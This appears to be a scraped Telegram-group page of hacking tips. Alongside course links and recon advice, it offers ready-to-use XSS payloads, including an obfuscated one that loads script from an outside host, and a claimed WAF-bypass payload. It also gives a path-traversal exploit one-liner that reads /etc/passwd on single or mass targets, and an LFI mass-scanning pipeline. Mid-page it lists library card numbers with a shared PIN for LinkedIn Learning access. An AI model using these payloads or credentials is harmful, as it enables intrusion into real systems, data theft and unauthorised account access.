Termux All Command [Telegram Group]

Bug bounty tip -> Resolve all subdomain IPs https://lnkd.in/d8pYg74d https://lnkd.in/d3qiQsDh https://twitter.com/zyzsec Resolve all subdomains to IP addresses. Save IPs to list1.txt Find the organization name http://target.com uses in SSL certificates Go to http://shodan.io and search ssl:"Target Company" Save the IPs you get from http://shodan.io in list2.txt5. Remove all the list1.txt IPs from list2.txt

CyberSecurity Training FREE Courses. 🔗Introduction to Cybersecurity: https://lnkd.in/ghQY8cKA 🔗Network Security : https://lnkd.in/gSHx2tJQ 🔗Cybersecurity Essentials: https://lnkd.in/gZe6bf-t 🔗Networking Essentials: https://lnkd.in/gjipDpgG 🔗NSE 1,2 & 3: https://lnkd.in/gsQJhn2a 🔗Vulnerability Management: https://lnkd.in/g64maMet 🔗Global IT Asset Inventory: https://lnkd.in/gXR5bD5N 🔗Risk Management by Open Learn: https://lnkd.in/gGPTDU2g 🔗Certified in Cybersecurity℠ - CC: https://lnkd.in/gW3w8Jqu 🔗CCNA Security Courses: https://lnkd.in/gfby3CR2 🔗Network Defense Essentials (NDE): https://lnkd.in/g6mRKt2t 🔗Ethical Hacking Essentials (EHE): https://lnkd.in/gRBGCud7 🔗Digital Forensics Essentials (DFE): https://lnkd.in/gPrkYcDH 🔗Dark Web, Anonymity, and Cryptocurrency: https://lnkd.in/gUrCCGdf 🔗Digital Forensics by Open Learn: https://lnkd.in/gdv8emgt 🔗AWS Cloud Certifications (Cybersecurity): https://lnkd.in/gaDGWdkm 🔗Microsoft Learn for Azure: https://lnkd.in/gDpkXiik 🔗Google Cloud Training: https://lnkd.in/get8rnkh 🔗Vulnerability Management: https://lnkd.in/gvNKJnni 🔗Software Security: https://lnkd.in/gG4P5bkn 🔗Developing Secure Software: https://lnkd.in/gQRwTzKU 🔗Port Swigger Web Hacking: https://lnkd.in/eEa-fNfu 🔗RedTeaming: https://lnkd.in/et_T2DEa 🔗Splunk: https://lnkd.in/et5bkjeY 🔗Secure Software Development: https://lnkd.in/ebGpA4wG 🔗Maryland Software Security: https://lnkd.in/e3z4zFmJ 🔗Stanford Cyber Resiliency: https://lnkd.in/eg9BM5Bv 🔗Vulnerability Management: https://lnkd.in/g64maMet 🔗Global IT Asset Inventory: https://lnkd.in/gXR5bD5N 🔗Scanning Strategies: https://lnkd.in/g6cQjQuh 🔗Reporting Strategies: https://lnkd.in/gs6Vn-DA 🔗Patch Management: https://lnkd.in/gnWVDCNp 🔗Policy Compliance: https://lnkd.in/g5SXKncJ 🔗PCI Compliance: https://lnkd.in/gZns6Xdf 🔗Endpoint Detection & Response: https://lnkd.in/gw22Y__E 🔗Vulnerability Management: https://lnkd.in/gYAFfAuT 🔗Introduction to Information Security : https://lnkd.in/ggdYxnUp 🔗Cloud Security Assessment & Response: https://lnkd.in/grrHivcW 🔗API Fundamentals: https://lnkd.in/gngVxhbu 🔗Cloud Agent: https://lnkd.in/gngVxhbu 🔗Container Security: https://lnkd.in/gYNCGY8A 🔗File Integrity Monitoring: https://lnkd.in/gYNCGY8A 🔗Palo Alto - https://lnkd.in/ebz4VZmQ 🔗AWS Cloud - https://lnkd.in/e_auX7VE 🔗Azure Cloud - https://lnkd.in/eCq_dvDq 🔗GCP Cloud - https://lnkd.in/eDNWnVsD 🔗SANS Aces - https://lnkd.in/eNCPrtdd 🔗ISC(2) Certified in Cyber - https://lnkd.in/e6jB_6af 🔗EC-Council - https://lnkd.in/ewiVUkYt 🔗Cyber Security - https://lnkd.in/eueCSF6A 🔗Cisco Cyber Induction - https://lnkd.in/e8C3jacc 🔗Cisco Cyber Essentials - https://lnkd.in/eTQNsbyF 🔗Cisco Network Essentials - https://lnkd.in/eMXXFBPN 🔗Palo Alto - https://lnkd.in/ebz4VZmQ Share, don't be selfish, don't think only of yourself. Share them, but you can't sell them/use them as part of any paid training.

Card: 3658662| Pin: 9909123 Card: 3658663| Pin: 9909123 Card: 3658664| Pin: 9909123 Card: 3658665| Pin: 9909123 Card: 3658666| Pin: 9909123 Card: 3658667| Pin: 9909123 Card: 3658668| Pin: 9909123 Card: 3658669| Pin: 9909123 https://www.linkedin.com/learning-login/go/sjpl Linkedin Learning

I got some great xss payloads javascript:%ef%bb%bfalert(XSS) <input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;"> <svg onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162'] ('\141\154\145\162\164\50\61\51')()"> "><video><source onerror=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYXlkaW5ueXVudXMueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61;>

I got some great xss payloads javascript:%ef%bb%bfalert(XSS) <input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;"> <svg onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162'] ('\141\154\145\162\164\50\61\51')()"> "><video><source onerror=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYXlkaW5ueXVudXMueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61;>

XSS payload "`'> Follow and share for more:

Trick of This Week: Shodan & Burp Suite 1. Shodan Query: Use http.favicon.hash:2123863676 hostname:<your-target-in-scope>. If no results, try filters like: "asn:" "org:" "ssl . cert . subject .cn :" "ip:" "domain:" 2. Verify Target Version: Ensure target is running version v8.x for effectiveness. 3. Exploitation: For single target: t="<ip>:<port>"; echo -e "\033[32m[+] Starting Attack On :\033[0m $t" && echo -e "\033[33m[+] Exploit PoC :\033[0m" && curl -k --path-as-is "http://$t/public/plugins/mysql/../../../../../../../../../../../../../../../../../../../../../../etc/passwd" 2>/dev/null | sed 's/^/\x1b[31m/;s/$/\x1b[0m/' For multiple targets: xargs -a hosts.txt -I@ sh -c 'echo "\033[32m[+] Target :\033[0m @" && echo "\033[33m[+] Exploit PoC :\033[0m" && curl -k --path-as-is "http://@:<port>/public/plugins/mysql/../../../../../../../../../../../../../../../../../../../etc/passwd" 2>/dev/null | sed "s/^/\x1b[31m/;s/$/\x1b[0m/"' Note: Always confirm scope and legality before proceeding. This trick is for educational purposes and should be used ethically and responsibly.

ALl version of Vm ware : https://vmware-player.en.uptodown.com/windows/versions

all verison of virtualbox : https://virtualbox.en.uptodown.com/windows/versions

nuclei Tool to 🤑 🤑 🤑 subfinder -d apple .com | httpx -mc 200 subdomain.txt cat subdomain.txt | waybackurls > url.txt cat uro.txt | uro > filterurl.txt nuclei -l filterurl.txt -t /private-Nuclei-Templates/

Tip for xss vulnerability, If you have a parameter call 'email' just try this payload: test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E

Another Reflected XSS : The Script Tag No Website Owner Wants in Their Code 🕹 Payload Used :

Cloud Security Attacks Resources GCP PenTest https://lnkd.in/dzy-tec3 Cloud Security Attacks https://lnkd.in/dz6nZRvX Awesome GCP Pentesting https://lnkd.in/dAEZjDcN Cloud AWS PenTest https://lnkd.in/dv5EReGZ Arsenal of Cloud Security https://lnkd.in/d3gASfFD Cloud Azure PenTest https://lnkd.in/dP8uQ55S

A payload that bypasses Cloudflare WAF <img/src=x onError="${x};alert(Hello);">

Local File Inclusion { One-liner Command } gau domain.tld | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'